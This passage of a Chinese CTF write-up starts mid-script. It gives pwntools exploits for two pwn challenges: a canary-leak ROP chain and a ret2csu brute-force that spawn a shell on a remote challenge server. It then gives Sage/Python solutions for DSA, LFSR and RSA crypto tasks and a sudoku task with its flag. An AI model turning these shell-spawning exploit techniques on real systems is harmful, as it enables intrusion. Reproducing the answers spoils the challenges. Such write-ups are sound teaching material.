system = libc.sym['system'] + libc_addr

binsh =  libc_addr + 0x00000000001b3e1a

pop_rdi = libc_addr + 0x0000000000026b72

ret = libc_addr + 0x0000000000025679

puts = libc_addr + libc.sym['puts']

execve = libc_addr + libc.sym['execve']

pop_rsi = 0x0000000000027529 + libc_addr

pop_rdx_r12 = 0x000000000011c371 + libc_addr





log.success('binsh_str: ' + hex(binsh))

log.success('system: ' + hex(system))





sh.recv()

payload = b'a'*0x18 + p64(canary) + b'\x00'*0x18 + p64(ret)*2 + p64(pop_rdi) + p64(binsh) + p64(pop_rsi) + p64(0) + p64(pop_rdx_r12) + p64(0)*2 + p64(puts)



sh.sendline(payload)



# gdb.attach(sh)





sh.interactive()

用了alarm里的syscall，需要爆破一下1/16

from pwn import *

context.log_level = "debug"

context.arch = "amd64"

#p = process('./blind')

p = remote('82.157.6.165',36000)

#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

elf = ELF("./blind")

def csu(arg1,arg2,arg3,func):

        mmmc = 0x04007A0

        pop6_ret = 0x4007BA

        payload = p64(pop6_ret)

        payload += p64(0)+p64(1)+p64(func)+p64(arg3)+p64(arg2)+p64(arg1)

        payload += p64(mmmc)+'a'*56

        return payload

read_got = elf.got['read']

alarm_got = elf.got['alarm']

bss = 0x00601000 + 0x500

prdi_ret = 0x4007c3

payload = "a" * 0x58

payload += csu(0, alarm_got, 0x100, read_got)

payload += csu(0, bss, 0x100, read_got)

payload += csu(bss, 0, 0, alarm_got)

#gdb.attach(p,'b *0x400753')

sleep(3)

p.send(payload)

sleep(0.1)

p.send('\xd5')

sleep(0.1)

payload = '/bin/sh\x00'.ljust(59,'\x00')

p.send(payload)



p.interactive()

Crypto

DSA

第一层解pell方程，网上找个脚本，根据cl1，cl2的最大bit数卡一下bit求出合适的解，即ul，vl，crt一下构造多项式求m1, m2，求出m1,m2也就求出和hm1,hm2，之后g很好求，指数上用费马小定理，发现求个逆即可，pq两个方程两个未知数解一下也就求出来了，之后用s2-s1求k，剩下的就没啥了，求出x12就好了

from pwn import *

from hashlib import sha256

from Crypto.Util.number import *

from tqdm import tqdm

import gmpy2

import math

from Crypto.Hash import SHA

from Crypto.Cipher import AES

from sage.modules.free_module_integer import IntegerLattice

import itertools



# def solve_pell (N , bound,  numTry = 1000):

#     sols = []

#     cf = continued_fraction ( sqrt ( N ))

#     for i in range ( numTry ):

#         denom = cf . denominator ( i )

#         numer = cf . numerator ( i )

#         if numer ^2 - N * denom ^2 == 1:

#             if numer.nbits() in range(bound, bound+10):

#                 sols.append((ZZ(numer) , ZZ(denom)))

#     return sols



wl = [3912956711, 4013184893, 3260747771]

cl1 = [2852589223779928796266540600421678790889067284911682578924216186052590393595645322161563386615512475256726384365091711034449682791268994623758937752874750918200961888997082477100811025721898720783666868623498246219677221106227660895519058631965055790709130207760704, 21115849906180139656310664607458425637670520081983248258984166026222898753505008904136688820075720411004158264138659762101873588583686473388951744733936769732617279649797085152057880233721961, 301899179092185964785847705166950181255677272294377823045011205035318463496682788289651177635341894308537787449148199583490117059526971759804426977947952721266880757177055335088777693134693713345640206540670123872210178680306100865355059146219281124303460105424]

cl2 = [148052450029409767056623510365366602228778431569288407577131980435074529632715014971133452626021226944632282479312378667353792117133452069972334169386837227285924011187035671874758901028719505163887789382835770664218045743465222788859258272826217869877607314144, 1643631850318055151946938381389671039738824953272816402371095118047179758846703070931850238668262625444826564833452294807110544441537830199752050040697440948146092723713661125309994275256, 10949587016016795940445976198460149258144635366996455598605244743540728764635947061037779912661207322820180541114179612916018317600403816027703391110922112311910900034442340387304006761589708943814396303183085858356961537279163175384848010568152485779372842]

# sol = []

# print([x.nbits() for x in cl1])

# print([x.nbits() for x in cl2])

# bounds = [879, 633, 866]

# for i in range(3):

#     sol.append(solve_pell(wl[i], bounds[i]))

# print(sol)



data = [[(10537190383977432819948602717449313819513015810464463348450662860435011008001132238851729268032889296600248226221086420035262540732157097949791756421026015741477785995033447663038515248071740991264311479066137102975721041822067496462240009190564238288281272874966280, 168450500310972930707208583777353845862723614274337696968629340838437927919365973736431467737825931894403582133125917579196621697175572833671789075169621831768398654909584273636143519940165648838850012943578686057625415421266321405275952938776845012046586285747)], [(121723653124334943327337351369224143389428692536182586690052931548156177466437320964701609590004825981378294358781446032392886186351422728173975231719924841105480990927174913175897972732532233, 1921455776649552079281304558665818887261070948261008212148121820969448652705855804423423681848341600084863078530401518931263150887409200101780191600802601105030806253998955929263882382004)], [(1440176324831562539183617425199117363244429114385437232965257039323873256269894716229817484088631407074328498896710966713912857642565350306252498754145253802734893404773499918668829576304890397994277568525506501428687843547083479356423917301477033624346211335450, 25220695816897075916217095856631009012504127590059436393692101250418226097323331193222730091563032067314889286051745468263446649323295355350101318199942950223572194027189199046045156046295274639977052585768365501640340023356756783359924935106074017605019787)]]

ul = []

vl = []

for x in data:

    ul.append(x[0][0])

    vl.append(x[0][1])

e = 7

m17 = crt(cl1, ul)

m27 = crt(cl2, vl)

P.<x> = PolynomialRing(ZZ)

f = x^7 - m17

m1 = int(f.roots()[0][0])

g = x^7 - m27

m2 = int(g.roots()[0][0])

m1 = long_to_bytes(m1)

m2 = long_to_bytes(m2)

hm1 = bytes_to_long(SHA.new(m1).digest())

hm2 = bytes_to_long(SHA.new(m2).digest())

r1, s1, s2 = (498841194617327650445431051685964174399227739376, 376599166921876118994132185660203151983500670896, 187705159843973102963593151204361139335048329243)

pq = 85198615386075607567070020969981777827671873654631200472078241980737834438897900146248840279191139156416537108399682874370629888207334506237040017838313558911275073904148451540255705818477581182866269413018263079858680221647341680762989080418039972704759003343616652475438155806858735982352930771244880990190318526933267455248913782297991685041187565140859

d1 = 106239950213206316301683907545763916336055243955706210944736472425965200103461421781804731678430116333702099777855279469137219165293725500887590280355973107580745212368937514070059991848948031718253804694621821734957604838125210951711527151265000736896607029198

t = 60132176395922896902518845244051065417143507550519860211077965501783315971109433544482411208238485135554065241864956361676878220342500208011089383751225437417049893725546176799417188875972677293680033005399883113531193705353404892141811493415079755456185858889801456386910892239869732805273879281094613329645326287205736614546311143635580051444446576104548

g = inverse(t, pq)

y = d1*x^2 + x - pq

q = int(y.roots()[0][0])

p = pq // q

k = (hm2 - hm1) * inverse(s2-s1, q) % q

x1 = (s1*k-hm1) * inverse(r1, q) % q

r2, s3 = (620827881415493136309071302986914844220776856282, 674735360250004315267988424435741132047607535029)

x2 = (s3*k-hm1) * inverse(r2, q) % q

print(p)

print(long_to_bytes(x1) + long_to_bytes(x2))

FilterRandom

filter中每次有0.9概率从s1中选择数字，0.1概率选择s2中的数据，因此out中大部分数据都是来自于s1的。通过计算，有很大概率存在连续64个来自于s1中的数据，可以检测一下，并找到连续数字开始的下标。

找到连续64个比特之后，只需要一直向前回溯，就能得到初始状态init1.第一部分代码如下：

N = 64

class lfsr():

    def __init__(self, init, mask, length):

        self.init = init

        self.mask = mask

        self.lengthmask = 2**length-1



    def next(self):

        nextdata = (self.init << 1) & self.lengthmask 

        i = self.init & self.mask & self.lengthmask 

        output = 0

        while i != 0:

            output ^= (i & 1)

            i = i >> 1

        nextdata ^= output

        self.init = nextdata

        return output



def backtrace(state, mask):

    mask = ((mask & 0x7FFFFFFFFFFFFFFF) << 1) + 1

    i = state & mask

    output = 0

    while i != 0:

        output ^= (i & 1)

        i = i >> 1

    state >>= 1

    return (output << 63) + state



output = "10001011010100011000100101001011100010110111001100001110000111011011100101101101000111101100010111100011000011111111010101111100101010101100010100000111011010011110111000100000101100101010110100111100011000101010101011011111011011000001101001011000010000011110001111001111011100110011111111101000111101001010000110001110111101001001101011101101001010001101010010110000000000001001101100101011110011010110011010110110011001001111001010100011110111100100010110111100110010000000010010011110001100000011000001110001000000010000100100101100000011100000011110101001011010011010100001101000010100100000011001011001000110000000000111011101000110010110111110010101110010001010001111111000011010000011001110111001000010011000000111010111100000100010011001111101110110100100011111000111000011111101010010110011111100010000100101011000001010101111101111001000011101111000111000101011010111100110001011011100101001010110110110110011100100111100110001101110010100010111100000110000010110100010001100011011001100100110101110010100011101110110010000010011100000011100000101010011011111110000100000010001010111011011111110100111100011100011110110010001011101111001011101010110111001001000111001001111001111110111111100001111100100110011111110110101000011010111110010001100000111100010011100011010000101010111010101101000011001110011000000110110110001101100110101110010010111011100110101000110000011001010100000110000000001110010001010001001101111100001111111011010010011100110010000111010001001111111110000010101110011010100100101101100111000010110100110010001010110111110011000111011101110100010000110110110011001011111011111000000000000001110000001000011000110111000000110100110110001111011111100010010011100101010000111000011111010000001010010011101010010110011000000001111110000000010111011000010001111000100110101110001000011111001101111111100011111011001001110000101001101110100111010011011101000110010000001001000001100110001110101100001000110100100010111101100010100110011111010011100100001101111010000110110101111111001111011100001101100000001101111100100"

mask1=17638491756192425134

mask2=14623996511862197922

ans=[]



for i in range(1984):

    gadget = int(output[i:i+64], 2)

    l1=lfsr(gadget,mask1,64)



    cnt=0    

    for j in range(i+64, 2048):

        if l1.next()==int(output[j]):

            cnt+=1

    total=1984-i

    ans.append((i, cnt / total))





ans.sort(key=lambda x:x[1], reverse=True)



ans2=[]

for i, each in ans:

    if each > 0.85:

        ans2.append((i,each))

    else:

        break



ans2.sort(key=lambda x:x[0])

idx = ans2[0][0]



init1 = output[idx:idx+64]

init1 = int(init1, 2)



for _ in range(i):

    init1 = backtrace(init1, mask1)



for _ in range(64):

    init1 = backtrace(init1, mask1)





print(init1)

得到init1之后，output里与init1生成不一样的数据就是init2生成的数据。由于lfsr是可以用矩阵表示的，因此可以用矩阵方程：$initA^{k-1}mask$得到第k个输出。我们已知100多比特的输出，那么就可列$xA=y$形式矩阵方程计算。

M = block_matrix(Zmod(2), [Matrix([0] * 63), identity_matrix(63)], nrows = 2, subdivide = False)

mask = mask2.digits(2)[::-1]

mask = Matrix(Zmod(2), mask).T

M = block_matrix(Zmod(2), [M, mask], ncols = 2, subdivide = False)

known = 

A = []

for idx, res in known:

    A.append((M^i*mask).list())



A = Matrix(Zmod(2), A).T

y = vector(Zmod(2), [x[1] for x in known])

print(A.solve_left(y))

输出向量2进制转10进制即init2.

HardRSA

第一层base是2的dlp，求解出x之后，解个多项式root求出p，已知dp情况下在modp下求解即可。

from hashlib import sha256

from Crypto.Util.number import *

from tqdm import tqdm

import gmpy2

import math

from Crypto.Cipher import AES

from sage.modules.free_module_integer import IntegerLattice

import itertools



y = 449703347709287328982446812318870158230369688625894307953604074502413258045265502496365998383562119915565080518077360839705004058211784369656486678307007348691991136610142919372779782779111507129101110674559235388392082113417306002050124215904803026894400155194275424834577942500150410440057660679460918645357376095613079720172148302097893734034788458122333816759162605888879531594217661921547293164281934920669935417080156833072528358511807757748554348615957977663784762124746554638152693469580761002437793837094101338408017407251986116589240523625340964025531357446706263871843489143068620501020284421781243879675292060268876353250854369189182926055204229002568224846436918153245720514450234433170717311083868591477186061896282790880850797471658321324127334704438430354844770131980049668516350774939625369909869906362174015628078258039638111064842324979997867746404806457329528690722757322373158670827203350590809390932986616805533168714686834174965211242863201076482127152571774960580915318022303418111346406295217571564155573765371519749325922145875128395909112254242027512400564855444101325427710643212690768272048881411988830011985059218048684311349415764441760364762942692722834850287985399559042457470942580456516395188637916303814055777357738894264037988945951468416861647204658893837753361851667573185920779272635885127149348845064478121843462789367112698673780005436144393573832498203659056909233757206537514290993810628872250841862059672570704733990716282248839

dp = 379476973158146550831004952747643994439940435656483772269013081580532539640189020020958796514224150837680366977747272291881285391919167077726836326564473



c = 57248258945927387673579467348106118747034381190703777861409527336272914559699490353325906672956273559867941402281438670652710909532261303394045079629146156340801932254839021574139943933451924062888426726353230757284582863993227592703323133265180414382062132580526658205716218046366247653881764658891315592607194355733209493239611216193118424602510964102026998674323685134796018596817393268106583737153516632969041693280725297929277751136040546830230533898514659714717213371619853137272515967067008805521051613107141555788516894223654851277785393355178114230929014037436770678131148140398384394716456450269539065009396311996040422853740049508500540281488171285233445744799680022307180452210793913614131646875949698079917313572873073033804639877699884489290120302696697425



c1 = 78100131461872285613426244322737502147219485108799130975202429638042859488136933783498210914335741940761656137516033926418975363734194661031678516857040723532055448695928820624094400481464950181126638456234669814982411270985650209245687765595483738876975572521276963149542659187680075917322308512163904423297381635532771690434016589132876171283596320435623376283425228536157726781524870348614983116408815088257609788517986810622505961538812889953185684256469540369809863103948326444090715161351198229163190130903661874631020304481842715086104243998808382859633753938512915886223513449238733721777977175430329717970940440862059204518224126792822912141479260791232312544748301412636222498841676742208390622353022668320809201312724936862167350709823581870722831329406359010293121019764160016316259432749291142448874259446854582307626758650151607770478334719317941727680935243820313144829826081955539778570565232935463201135110049861204432285060029237229518297291679114165265808862862827211193711159152992427133176177796045981572758903474465179346029811563765283254777813433339892058322013228964103304946743888213068397672540863260883314665492088793554775674610994639537263588276076992907735153702002001005383321442974097626786699895993544581572457476437853778794888945238622869401634353220344790419326516836146140706852577748364903349138246106379954647002557091131475669295997196484548199507335421499556985949139162639560622973283109342746186994609598854386966520638338999059

g = 2

G = GF(y)

x = log(G(c1), G(g))

P.<y> = PolynomialRing(ZZ)

f = 2019*y^2 + 2020*y^3 + 2021*y^4 - x

p = int(f.roots()[0][0])

m = int(pow(c, dp, p))

print(long_to_bytes(m))

密码人集合

ip:

82.157.25.233

port: 38700

protocol: tcp

nc连上数独题把汉字对应1-9编排求出解

输入abcdefghi即可。

> 请输入答案字符串：

拿要第我西湖论剑一湖西论剑要一我拿第一剑我论第拿要西湖第论湖要剑西一我拿西我要一拿第剑湖论剑一拿湖我论第要西要拿一第湖我西论剑论湖剑西一要拿第我我第西拿论剑湖一要

恭喜！答案正确，这是你的奖励DASCTF{b883513d6d97e0e9e8a3e4dc28b02621}。

继续开启下一站的旅程吧。

转换为汉字输出即可拿到flag b883513d6d97e0e9e8a3e4dc28b02621